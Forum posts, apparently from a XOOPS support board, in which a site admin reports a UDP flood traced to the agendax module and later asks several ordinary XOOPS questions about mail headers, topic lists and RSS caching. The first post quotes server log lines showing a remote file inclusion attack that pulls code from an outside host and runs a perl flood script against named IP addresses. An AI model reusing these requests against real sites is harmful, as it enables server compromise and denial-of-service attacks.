I was contacted by my network folks telling me of a udp flood attack. We traced to malicious code being run in agendax. It looks like this:

servecity.com:200.222.244.130 - - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:21:34:37 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 1203 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 1227 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130
- - [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:23:34 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2067.18.52.95%2080%2050000%20>>%20/d
ev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"servecity.com:200.222.244.130 -
- [22/May/2004:22:28:32 -0400] "GET /modules/agendax/addevent.inc.php?agendax_path=http://packetx.org/cmd.gif?&c
md=cd%20/tmp;nohup%20perl%20udp006.html%2069.93.199.98%2080%2050000%20>>%20/
dev/null%20& HTTP/1.1" 200 431 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)"


I removed the mod for the moment. I did not find anything here. Anyone know anything?

--> Sorry, I found something deeper in the forum <--

Never mind

Where exactly do I add the code to add a Reply-to:? I want to get the old 1.x behavior where a reply to a rec'd contact form goes to the sender. It is much easier than the new message --> copy --> paste model. I see the ReplyTo code in class.phpmailer.php, but do not know how to make it work. I tried adding perhaps a foolish line to the /modules/contact/index.php that looked promising, bu php said I was calling a function.

I guess what I need to know is how/where lines like
$xoopsMailer->setFromEmail($usersEmail);
are handled as well.

Lastly, how can I add additional email headers?

I was exceptionally surprised that I am the only one to ever need to ask this - duh.

I am attempting to decipher the dependancies of the functions in /class/xoopstopic.php. In particular I want to use the function &getTopicsList() to generate a list I can then use to generate a news topic menu that is a list instead of a pulldown.

I am beginning to think that this file needs to be called after a lot of stuff is loaded (included). Any help?

I would, of course, rather have a readymade block that does this, but I cannot seem to find one, so I suppose I will make one once I can find what I have to include to make the function work.

Thanks

After a server crash I uploaded a full backup of the site (2.0.3). Everything works right except for the backend.php. When backend.php is called it writes db%3Asystem_rss.html to the cache directory. The contents look sparse like this:
a:3:{s:8:"template";a:1:{i:0;s:18:"db:system_rss.html";}s:9:"timestamp";i:1079875328;s:7:"expires";i:1079878928;}

This, of course, ends in an empty xml output.
I was thinking I had some permissions wrong when I uploaded the backup, but I can't think what it could be.

Anyone?

Thanks

Please excuse the acts of this foolish man. The hitch was I forgot chmod templates_c - sorry.

A new question: Why do characters such as " ' " appear as squares (undisplayable characters) in the RSS? Fix?